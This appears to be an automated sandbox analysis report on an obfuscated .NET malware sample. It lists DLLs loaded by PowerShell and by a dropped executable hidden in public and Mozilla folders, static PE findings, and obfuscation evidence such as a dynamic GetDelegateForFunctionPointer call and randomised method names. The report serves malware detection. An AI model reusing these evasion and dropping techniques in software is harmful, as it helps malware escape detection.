Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: version.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: wldp.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: profapi.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static file information: File size 2335232 > 1048576
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x239a00
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs .Net Code: Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777246)),Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777260))})
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF00BD pushad ; iretd 0_2_00007FF848DF00C1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF4C1A push esi; retf 0_2_00007FF848DF4C21
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FAC3FB push ecx; iretd 0_2_00007FF848FAC3FC
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042601 push es; ret 0_2_00007FF849042605
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF8490418E2 push edx; ret 0_2_00007FF8490418E4
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849044714 push edx; ret 0_2_00007FF849044716
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042B42 push edi; ret 0_2_00007FF849042B43
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E200BD pushad ; iretd 53_2_00007FF848E200C1
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E24C1A push esi; retf 53_2_00007FF848E24C21
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs High entropy of concatenated method names: 'yH64sxUQPW9Dic6D28X6', 'JHpy9BUQ9StbmGFHXi8K', 'i9EOOKHIHw', 'uvvFeMUQ4govAjVxRdM6', 'yijOOVUQo55U9nrAyDx5', 'WYxPsmUQumP8GfZ1TNmW', 'Li8v0XUQHh33r4xtIsKt', 'Vfb9KyUQpk2xXHGKZ5E1', 'Iq3QNEUQjQxZZT3vGIjE', 'vTHgqjUQTJnJ3x8s3Dl3'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, kwPSPhrX6AXT1PPkDSR.cs High entropy of concatenated method names: 'c1emR9xfXA', 'RaYmUMa7Gx', 'VqumBkd842', 'bwMm8HliLR', 'rGmmYvMSY2', 'Veq1m8UfxnsSyl0vt8Ad', 'ovC2acUfS3FX3753dfjC', 'K6nsbIUfI96P685PNwEH', 'YgDFWdUfwNrGpaaQUcG5', 'Nt0FfRUfgGfJQkyGbMle'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, zA8EyhxiAaulRTNFJqY.cs High entropy of concatenated method names: '_54f', 'd65', 'k1mUYYDH7ro', 'fn4UYvNWu9p', 'SEfUI563PUi', 'zp2UYRcxbBk', 'jWj8r9Ujkd00LwSy0mx4', 's9kc4LUjEbn3NeCg4G8e', 'ay66u1UjfqW8ZWt3Bby7', 'dkwfdqUjnjSvRTeLIJRs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, iq1W5kgtq5FSXBee3L4.cs High entropy of concatenated method names: 'Vxxk4WULyQ0cS3ynrd8e', 'uvse9KULb8wsiG1a5NaO', 'bWeE6yULmFnP3xbDLdA3', 'vVnTjEUL0Pl5eT8my0dT', '_7kT', '_376', 'GajgIKwLFG', 'h94gxOLwYY', '_4p5', 'MU0gwpob4Y'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, FWLFUjYDI5Z9lLMo7SC.cs High entropy of concatenated method names: 'FlUYQU56lA', 'nfLYXSulH9', 'UOOYzs1SQQ', 'VbV0ReUodLtsF3KK5Xkt', 'N9o4HoUoFrYEAQZLyS8y', 'Va9g3LUoDVyt9uIBHitD', 'y7ItGOUoeinAFR13N9Zs', 'jlrYeh20bP', 'ARDYlq1Eg6', 'sW7YKAwEYs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, iZka6hv6hoQB0oDAyyK.cs High entropy of concatenated method names: 'epgvOs62Gn', 'OFdvQnIjSk', 'VBw2cxUuExD1eOIhQTqU', 'b7bSMrUunkgSWRfFvl5k', 'lGmrXBUukLY8dcC4XseL', 'FTStUcyfYR', 'dipqv4UusEuAkiXqZBSw', 'BygKPCUuNrgDvGemvQhU', 'dF1DLbUuh0RdLVOFvK5B', 'pq2MZhUu6aIXQfTlmZwm'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jagvsqxlbQ1Npg5bcIb.cs High entropy of concatenated method names: '_46E', 'd65', 'KSqxJ4A7gI', 'kl1UI4DITta', 'zp2UYRcxbBk', 'ApIxOYh090', 'E8XXGkUTol8XykkGs4y7', 'KD9hQhUTupZKR06diPMm', 'Lv52EUUTC5jMpCMFpMY7', 'YXy6oGUT4vdZ4DHcAti5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, MuXgOReXnWG7lZYIbVW.cs High entropy of concatenated method names: 'nwhlBIpErD', 'kX9l87EoX1', 'N9VcUDUOjQhKvox6vFZ0', 'DYeUWbUOHIg1bJvRZRa1', 's6HKojUOp66pNd2L62Mr', 'zGNvpNUOTy2nEvIACJI3', 'Y3of2mUO3smdHStsagsw', 'AbllRswKw3', 'GF24v4UO4q8MjMZpdfl7', 'cKw9mDUOodivSS2qxQlv'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, XqZuliVwjQ7OvhqDjPK.cs High entropy of concatenated method names: 'OSIVW96eHB', 'dUBVAlpUKV', 'L1rVifKCev', 'q5C6oHU6t3w8JFb1wj8c', 'dJTmbFU6YACuA8NXe9Pt', 'U3imbsU6vpQ4GVW0wHYg', 'NiBrJfU6SPQB6ywAa1TH', 'rWKSJWU6IjQPwhRrxMDc'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QJHE5TYPMVMbxLvlIfA.cs High entropy of concatenated method names: 'vv2YMJMYOF', 'YXnYVjvPKD', 'o8mYCKHmhL', 'WeAY4j3kth', 'mgpv8mUoqgtv5oEtHYhC', 'CdRpAKUoy9cqZ56XNCCA', 'g467veUobBQF9km8EIM4', 'I6qwa9Uo2KlASZZZdBF5', 'MFT3f4UoG1qrslVoO4WK', 'zpDpJSUo7XpddjYbuAoQ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LHAdmnQESAYTZ15ORjB.cs High entropy of concatenated method names: 'JPQUts2dq1m', 'nFVUtNCevFA', 'Ma3UtF3osYT', 'dEAUtDeb9r8', 'zdVUtdFx13K', 'NYdUteJhkv2', 'ObuUtlmDPNZ', 'J4JXxYQAEC', 'lSsUtK60nDt', 'zwxUtJxo90P'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5xWcCyB1wLmtO2HCCC.cs High entropy of concatenated method names: 'Doyyy8Urvo', 'J2gyqLl8wo', 'UqpyYdYt7w', 'CdqyvLy6dY', 'VdeytaDOck', 'IsJySf8gto', 'AvCyI3sLQQ', 'ip4yxyiBIb', 'sG5ywNHMU2', 'jWUygp6d3F'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, DUnBXYBErhNJVq3uIso.cs High entropy of concatenated method names: 'XT6BQEUyly', 'VXPBXl9Mgr', 'gDGBzwvdAU', 'nHIjq8UCLjSh7L2pUkpU', 'UThFp8UCcTrjQ3XQLfmJ', 'NWy87EUCTfP5ZHut2RFe', 'WQDJQfUC3rP8UfnIEP3L', 'QKt8vOrVP4', 'FvpYbGUCnsTaFPh1hmR9', 'XfC0FVUCk66A5mFjkPGP'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, otpoGTCcQMZp3wPo5xn.cs High entropy of concatenated method names: 'rBmCnbTH6u', 'r1tCkDV4IN', 'eRYCEl8JoZ', 'vOECapUEBK', 'nXQChXJKOB', 'KeoC6u4QQp', '_4tg', 'wk8', '_59a', '_914'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pJIJLUAE8v2YFOD09Go.cs High entropy of concatenated method names: 'CdXAh5oZaS', 'swmA6a6f4u', 'SoFAsc9diL', 'OxEANGjhsp', 'AOPAFSREiK', 'M96aq1Uc8O8rgqRBtH29', 'VEnBlOUcUyQsp38gZ1ry', 'I0pCSEUcBnbnn7D4oSJv', 'SqpiQnUcY3WFkyNLP9kb', 's97ptGUcvgydV7SGCPjY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, RfoLfwUH8RAQV8sRBm0.cs High entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', 'atAUI0PvadZ', 'n6rU8F0761x', 'eRnbgxUVYxcvtOqTDitn', 'jqTmoJUVvptivO3Lf425', 'bHOPmSUVtRXJ4GqI6apY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PYZXvvYf49oySEdTINW.cs High entropy of concatenated method names: 'BRlYNfcYGT', 'X3GpcHUonCnBnPYcCBZj', 'gMCBjFUoknBXu7NarTHK', 'gwgSb4UoEaLCgJqSWWOm', 'JJLYkxb46E', 'kHUYEpPDnK', 'cI4YaP4xXd', 'NX1YyKUo3pxfwXGxZc28', 'q76XTPUoL9QyGqckegFO', 'KoB3CkUojJS0tS9QH1Gi'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WAFgav3bYkZ6iAl5HF8.cs High entropy of concatenated method names: 'vUO32aglGJ', 'mp53GldtAE', 'UMI37gXNiU', 'Roy3ZH4brP', 'w2D35Pb6fp', 'yvU319muGA', 'H1s3PGdGkI', 'mZZ39Wm8ir', 'LQ33MrTaYb', 'iBc3VF4N4n'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, a7B0JrmzObeCCtmOJs5.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'JqK0UhGaTS', 'mn60Blpa7T', 'gY2', 'rV4', '_28E'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QLEqd5yeA3ehGBr5A76.cs High entropy of concatenated method names: 'yolRx1UEcmQJIcy4ptvR', 'bod2PAUE35XkUNk5GoRv', 'TStXV8UELmfGZFtldAsi', 'xNqv75UEf222aexyc1Uq', 'jmYZPR7Kvi', 'saLTT7UEaaqHQE2a47IS', 'oscGE5UEk43aVE8ojyPO', 'TuyF7XUEEyx7MQWjKE2P', 'rFcN0iUEh7ndGPHZtwea', 'yKoZVhd2yb'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tHAAHjoRh1feG0AOJyt.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lnX7gnwJQkLP0ZywDe1.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'TqEwQxtvW9', 'ohpUIn3l4QT', 'PMGwX7LHv6', 'rSUUIklJRPw', 'Uq06jOU36s3ejjC5GBcp', 'V1G49KU3atK6QrQrjKR8', 'ODWZPcU3hJWNLLbMnyyx'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lOpa0QHZwdmAYd1Li0Z.cs High entropy of concatenated method names: 'f86pmJRXuI', 'wm02FgUFQEtSYDXvyr2V', 'WDqDSqUFJOUZEcYB6ENl', 'wFxii6UFOVJBM53Ppycq', 'OZoeQBUFXOOyeCd89ZZY', 'i5X', 'TZcH1jFmbY', 'W93', 'L67', '_2PR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IqZmiYIsU1GgVaBhusb.cs High entropy of concatenated method names: 'oK2Il1L6jm', 'pJKIKkvaQh', 'EpWIJKdYZK', 'WlQIOl30xY', 'ei4IQ2UXTN', 'O1NIXcjwuH', 'TofIzK5hYq', 'HfquxQUjPN8Ualk5cHcI', 'AtFnpiUj9ODEdRBFlrpP', 'qnFoeLUj5ARqFQfg8dDX'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, DGFlcE80b8JNobvVUXc.cs High entropy of concatenated method names: 'o8V8VC9rTu', 'HoJ8C2cXTy', 'LAt844nNPn', 'sfqkvOU4itA941eDPMBm', 'QpiGM7U4rOvUoHbPc0ZD', 'zctVR7U4WEgwWlJTTUDq', 'tmG1g7U4AlaDvpkY1ApV', 'mhZ81PcDX6', 'tKv8POOMee', 'P6sGyQU4xGiUODaGSiGl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vnpnbCxzghZ0BorguNs.cs High entropy of concatenated method names: 'A9CwtU2g9l', 'FtUc8jUTnRuWioxmbYGg', 'P59iSjUTkVjwXDmkhwBY', 'babmCQUTEyH8qoqGvB10', 'kdEakGUTa7Edoh594WUX', 'eq7', 'd65', 'f3PUYGepihL', 'i9cUY77fMA1', 'ODgUIotBy2y'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, OccFLeUijS83Gb9EMKw.cs High entropy of concatenated method names: 's2CUmnMYGi', 'nc4U0kgLk2', 's7ZUyZMdvm', 'gKeXVxUMcRiRVZj1nMep', 'Y2tulRUM3MZOsiUkauKg', 'vjPN8tUMLoxawwjABaX6', 'ECERYqUMfraZo3nEdObJ', 'PEo8l8UMn9cT5KBGL4rY', 'YK9rC0UMksar5OjhPWLW'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Rw9aZa8jr9fAb5q2pwr.cs High entropy of concatenated method names: 'Dbx83CMD3O', 'X5i8LCIVOn', 'TEP8c8bPdP', 'Pe58fxsEP1', 'ehv8nl6gpn', 'MWk8k1PiFO', 'wD38EVFQOF', 'Amn8aBl2yL', 'XTS8h8HKKs', 'Smd86PEDaY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Sdda55wLc9fEvK4sCqf.cs High entropy of concatenated method names: '_2SY', 'MWpUITJPZow', 'OQrwfRACND', 'fdfUI3WSZC1', 'nJGns9U3POsikHwkw3m2', 'PNeaehU350b9FoJvT1AS', 'bysIiLU31y8kfEdswRIt', 'A3UcARU39PG3JmWOxoxv', 'kAEQTiU3Mo5tYhoRYXjD', 'gcIURaU3Vqx5w4lhC3Gs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, CNGS1Ywx4QKFymOCPD9.cs High entropy of concatenated method names: 'qicwiJhaTf', 'tIryL2UTe9G9r89qvfGp', 's0XdslUTlkBSHYxW9ubv', 'YAnjuaUTKlQ5tbORlZ6r', '_53Y', 'd65', 'W6IUY5GZBH7', 'Wv4UY1rtd0o', 'fXCUIubhyGP', 'zp2UYRcxbBk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pXW4euSHeJXI9S28nlT.cs High entropy of concatenated method names: 'R3gS6gEK7o', 'ba3SsgYIti', 'z8cSNZ84Dk', 'FQWYhdUpPWHZH81129cU', 'hKs5qbUp97HxZ49kiCo1', 'IkHrfyUp5mR5xyaFpEiL', 'HqZqKiUp1QYdiVIGOxZq', 'MvFSjZD9xL', 'w7OST8Faml', 'KlZS3wnnhd'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, rPwErV8QS2EWByRUlUd.cs High entropy of concatenated method names: 'HPgYrjaYPr', 'N9frsSUovrp1m0miUb3c', 'fJeERXUotrqswVV0V3iA', 'hNQ8QpUo80pDhCV8yceZ', 'gmmV1cUoYI50flDT0b8X', 'qJNaBjUoweaOBo66dUoL', 'Ju4ENsUoID8uttOcZXIj', 'BEeT9HUoxwQFLw7HIGnk', 'FMt9vGUogHNVJ5JRROdn', 'wEeYZeDtUt'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vc1uUZxMZDE6NGQgVac.cs High entropy of concatenated method names: '_71a', 'd65', 'htqUYgZpHjj', 'yVjUYWrsUmP', 'JAEUI9J3ooJ', 'zp2UYRcxbBk', 'VMWvo4UTRN03y5UIDI0W', 'vgRtZTUTUc8N8WH94O2l', 'l0gL8NUTBLyZlwYTMjb5', 'a2jF2uUT8S8B97b7CpjZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jLXs83BqEYiLKytjiG5.cs High entropy of concatenated method names: 'K6gBGjQShY', 'pk4B7vH6QU', 'UhX4XTUCBrN581dGFY8r', 'IGi31eUC82QLTJ2FCf7Q', 'LkKsRPUCYr2X07XFPZYR', 'pcFLJ7UCvxYtaWwhWaMA', 'eqrFefUCtEhLii5kC5IN', 'nOHZbPUCSPj0W5yqWYjZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vJ9xG3UfoFXp3qtLQsS.cs High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'di1UIyOAuTt', 'n6rU8F0761x', 'XHPBQCUVgNW27mIJArQa', 'THTpqpUVWBHpryaFiZCF', 'Sm2bh5UVA36CZiHj3Oeu'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, urbpt3Q7MLrEJObSEg4.cs High entropy of concatenated method names: 'cekQH5xZ4K', 'ctBQpPucfA', 'oD0QjuqEJw', 'wdYQTnKBRQ', 'd38Q3V4nb8', 'TG0QLk32Nf', 'GArQctnwaI', 'X5VQfx4V1A', 'DkWQnaMqU6', 'iNsQk4angb'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L0jcodoMDE7vT5FwGl1.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AO8MU0BU1a9hwE6yPuY.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'ujvUI2IUaYg', 'n6rU8F0761x', 'DIgJwtUVTfjDNeidY1RQ', 'Pg2nh3UV3At92UGoBjMH', 'ivFINAUVLyW9GwaKaEVp'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pKx0ZJyPx8QC5XVopv7.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i8K3StFDUFoTg9qoEj2.cs High entropy of concatenated method names: 'NnQUIhQ3cfg', 'mtAFeErmpr', 'xphFlD3J9L', 'mvoFK9CbFG', 'e5qscNUluNy8OPRDUirO', 'mEnNFFUlHUPlpmi1RX39', 'q8cMViUlpTkn3go2N5iB', 'MrgsAKUljfk6lFeyJTw7', 'xbrx1WUlTkFrE4L6yCcg', 'chCNguUl3pUTmQb6x4OA'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, URuHrCBIMbthiy4wX3j.cs High entropy of concatenated method names: 'MhMBwTTXsc', 'i1lBgTX7V7', 'JYGBWywKEg', 'JcspRDUV6ti4FY4eCNhr', 'vLN7K3UVaWyMa6l9dqTl', 'MTEmjKUVhEVsU681ud31', 'p7N70yUVsHDFa32d7iwR', 'BwGl11UVNcWAmZBMo2ZL', 'vKnBpCUVFYIDeydLivYM', 'jP3EcgUVDr6AqrnnshOS'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, qUhfWMxZTKKnp3HJBiU.cs High entropy of concatenated method names: '_64Z', 'd65', 'xLvUIPX4AcM', 'zp2UYRcxbBk', 'u08x1T7Noc', 'F98Bu6UjKxkumHass89G', 'hmcH5FUjJSKTlSjLfAsE', 'aYEoEZUjOLHf6cS15sBg', 'GixaIwUjQbn8Ww3khU3o', 'mIS9APUjXtY10K8sHw3B'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T7M26dwmf00XyV70fot.cs High entropy of concatenated method names: '_5t1', 'd65', 'OK1UY9DtVsh', 'qS6UYMSu9Ox', 'XyUwy655B7', 'G4dUIHfdncl', 'zp2UYRcxbBk', 'MGiHC3UTOedr6W1rJA3P', 'N647nRUTQZwv1mF0ubgT', 'W0aPPJUTXxeIEdV4d6hV'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WOCrHDZTAWo5LqBCUyn.cs High entropy of concatenated method names: 'kk8MPk8kNI', 'MQoM9L531b', 'hiq0a6UhogHhHQGqGZwE', 'JFGljqUhCPqwFuUkHNn7', 'toSl1JUh4WMCY80ZrS36', 'ppHlZUUhuhXdaRin1QTh', 'jOpMu4sB6y', 'CNcuv8UhTPTnVaCBhNht', 'KA2JkdUhp9n4LvoVGuZ2', 'KGOi9hUhj0ykpaKPVdJR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVXthH3n8T6G3myquXS.cs High entropy of concatenated method names: 'OCE3ED2003', 'XA23auVsHO', 'pf73hUbCHp', 'fWV36Sk9qt', 'g0b3s7SS0h', 'dvj3NOKfMl', 'kWC3FIhp7K', 'c9C3DAFAgG', 'dpO3dXAw75', 'Fb93eh5Zyc'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, K3MrYRxoS3lKpqkMQ14.cs High entropy of concatenated method names: 'NlNxfb1bmk', 'gxxQjnUTmsJR7yBrkjcI', 'M2LGRwUTibWgPvjRMIYS', 'iufvhBUTrm9khMqEA3Ki', 'eBVU19UT090TO0g5pq0u', 'H05MVJUTygoL2DCGGjhh', 'UU8', 'd65', 's0PUYiKp0dm', 'P3BUYrDiZEk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, o7buEyjIKSG2WlWQXtc.cs High entropy of concatenated method names: 'jX1jwSowMg', '_64r', '_69F', '_478', 'sA5jg23FWR', '_4D8', 'p6YjWn3XZ1', 'fgJjAseEFc', '_4qr', 'OpijiHGuQr'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, P5Cf1e436KNTloDetv9.cs High entropy of concatenated method names: 'r004cgjU3G', 'gSv4f4Mb4c', 'PfT4nfSYqq', 'xuw4kwrFwU', 'sps4EMacoo', 'hcMWcAUNGfHSaKVt20iX', 'TKxEJGUN7utJA46xXgj2', 't3Ux3iUNZoiH7OawM27x', 'JIfmMGUNqc2evlXmNgtd', 'W7nP0HUN2pSUu3RuuJjt'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, hLDRxa8wZGXKfG11WjD.cs High entropy of concatenated method names: 'Dly8W1vUFi', 'V1G8AZiqsx', 'Ed58iOPNJL', 'PmJaDfUCeumTToxOnDn9', 'GwsXYuUCl6kPetnKjKg8', 'rbVlmhUCD2RUipRAIcFc', 'FPSOkdUCd6V1q6IrQ90b', 'NQaD0YUCKLdd7TkWvisS', 'vTlfgGUCJpm5FilXxFTE', 'PasvvtUCO8sTO5qjsvMH'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JyV4N6dY0a6hTdngRaX.cs High entropy of concatenated method names: 'IpDdtQN3OQ', 'LHQdSVf2kf', 'M1mdIiL7I0', 'nA7dxebYaZ', '_0023Nn', 'Dispose', 'KZMJ4JUJRAE1bfRmks2y', 'n385aIUKXUJBctKNrhu9', 'R1v47MUKzkhdTNdvVUrU', 'JVWT10UJUY2bCP37Gk9E'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jgxeTiFJwhJAMyAckUe.cs High entropy of concatenated method names: 'jQ8DWR6stn', 'ojduNYUKiKr1y4CeUcUr', 'iM4ZgVUKrG8EioFuclEc', 'xkFCBaUKWxZRp0Gca64f', 'JUGkmQUKAqctdYIBYGCJ', 'CPX', 'h7V', 'G6s', '_2r8', 'rqoUtpijpcn'
